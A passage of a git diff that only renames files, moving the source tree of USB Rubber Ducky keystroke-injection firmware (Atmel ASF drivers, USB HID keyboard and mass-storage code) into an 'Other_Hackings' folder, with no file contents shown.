a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/genclk.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/genclk.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/genclk.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/genclk.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/osc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/osc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/osc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/osc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/pll.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/pll.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/pll.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/pll.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/sysclk.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/sysclk.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/sysclk.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/sysclk.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/genclk.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/genclk.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/genclk.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/genclk.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/osc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/osc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/osc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/osc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/pll.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/pll.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/pll.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/pll.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/sysclk.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/sysclk.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/sysclk.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/sysclk.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/sysclk.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/sysclk.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/sysclk.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/clock/uc3b0_b1/sysclk.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/sleepmgr/sleepmgr.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/sleepmgr/sleepmgr.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/sleepmgr/sleepmgr.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/sleepmgr/sleepmgr.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/sleepmgr/uc3/sleepmgr.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/sleepmgr/uc3/sleepmgr.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/sleepmgr/uc3/sleepmgr.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/sleepmgr/uc3/sleepmgr.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/sleepmgr/uc3/sleepmgr.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/sleepmgr/uc3/sleepmgr.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/sleepmgr/uc3/sleepmgr.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/sleepmgr/uc3/sleepmgr.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/storage/ctrl_access/ctrl_access.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/storage/ctrl_access/ctrl_access.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/storage/ctrl_access/ctrl_access.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/storage/ctrl_access/ctrl_access.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/storage/ctrl_access/ctrl_access.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/storage/ctrl_access/ctrl_access.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/storage/ctrl_access/ctrl_access.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/storage/ctrl_access/ctrl_access.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_conf.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_conf.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_conf.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_conf.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_desc.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_desc.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_desc.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/kbd/udi_hid_kbd_desc.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/udi_hid.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/udi_hid.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/udi_hid.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/udi_hid.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/udi_hid.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/udi_hid.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/udi_hid.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/device/udi_hid.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/usb_protocol_hid.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/usb_protocol_hid.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/usb_protocol_hid.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/class/hid/usb_protocol_hid.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udc.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udc.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udc.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udc.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udc_desc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udc_desc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udc_desc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udc_desc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udd.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udd.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udd.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udd.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udi.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udi.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udi.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/udc/udi.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/usb_atmel.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/usb_atmel.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/usb_atmel.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/usb_atmel.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/usb_protocol.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/usb_protocol.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/usb_protocol.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/services/usb/usb_protocol.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/utils/interrupt.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/utils/interrupt.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/utils/interrupt.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/utils/interrupt.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/utils/interrupt/interrupt_avr32.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/utils/interrupt/interrupt_avr32.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/utils/interrupt/interrupt_avr32.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/asf/common/utils/interrupt/interrupt_avr32.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_access.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_access.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_access.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_access.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_board.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_board.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_board.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_board.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_clock.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_clock.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_clock.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_clock.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_explorer.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_explorer.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_explorer.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_explorer.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_sd_mmc_spi.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_sd_mmc_spi.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_sd_mmc_spi.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_sd_mmc_spi.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_sleepmgr.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_sleepmgr.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_sleepmgr.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_sleepmgr.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_usb.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_usb.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_usb.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/config/conf_usb.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/main.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/main.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/main.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/main.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/main.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/main.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/main.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/main.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/main2.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/main2.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/main2.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Ducky_Multi_Payload/src/main2.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB.atsln b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB.atsln similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB.atsln rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB.atsln diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB.atsuo b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB.atsuo similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB.atsuo rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB.atsuo diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/USB.cproj b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/USB.cproj similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/USB.cproj rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/USB.cproj diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/license.txt b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/license.txt similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/license.txt rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/license.txt diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/boards/evk1101/evk1101.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/boards/evk1101/evk1101.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/boards/evk1101/evk1101.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/boards/evk1101/evk1101.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/boards/evk1101/init.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/boards/evk1101/init.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/boards/evk1101/init.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/boards/evk1101/init.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/boards/evk1101/led.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/boards/evk1101/led.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/boards/evk1101/led.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/boards/evk1101/led.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/flashc/flashc.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/flashc/flashc.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/flashc/flashc.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/flashc/flashc.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/flashc/flashc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/flashc/flashc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/flashc/flashc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/flashc/flashc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/gpio/gpio.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/gpio/gpio.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/gpio/gpio.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/gpio/gpio.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/gpio/gpio.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/gpio/gpio.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/gpio/gpio.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/gpio/gpio.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/intc/exception.S b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/intc/exception.S similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/intc/exception.S rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/intc/exception.S diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/intc/intc.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/intc/intc.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/intc/intc.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/intc/intc.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/intc/intc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/intc/intc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Mass_Storage/USB/src/asf/avr32/drivers/intc/intc.h rename to 